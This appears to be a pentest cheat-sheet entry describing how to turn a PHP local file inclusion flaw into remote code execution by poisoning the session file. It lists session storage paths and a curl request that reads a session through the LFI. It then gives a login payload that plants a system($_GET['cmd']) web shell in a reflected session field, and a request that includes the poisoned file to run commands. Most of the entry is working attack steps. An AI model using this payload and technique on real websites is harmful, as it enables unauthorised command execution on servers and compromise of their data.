Theory
If the website use PHP Session (PHPSESSID), we may poison cookies and include it throught LFI
Practice
First we should find where the sessions are stored, for example
# Linux
/var/lib/php5/sess_[PHPSESSID]
/var/lib/php/sessions/sess_[PHPSESSID]
# Windows
C:\Windows\Temp\sess_[PHPSESSID]
Second, display a PHPSESSID to see if any parameter is reflected inside:
curl $URL/?file=/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
In this case, we can inject some PHP code in the reflected parameter in the session.
We can inject some PHP code in the reflected parameter in the session.
#Set cookie to <?php system($_GET['cmd']);?>
login=1&user=<?php system($_GET['cmd']);?>&pass=password&lang=en_us.php
Use the LFI to include the PHP session file
curl $URL/?file=/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27?cmd=id
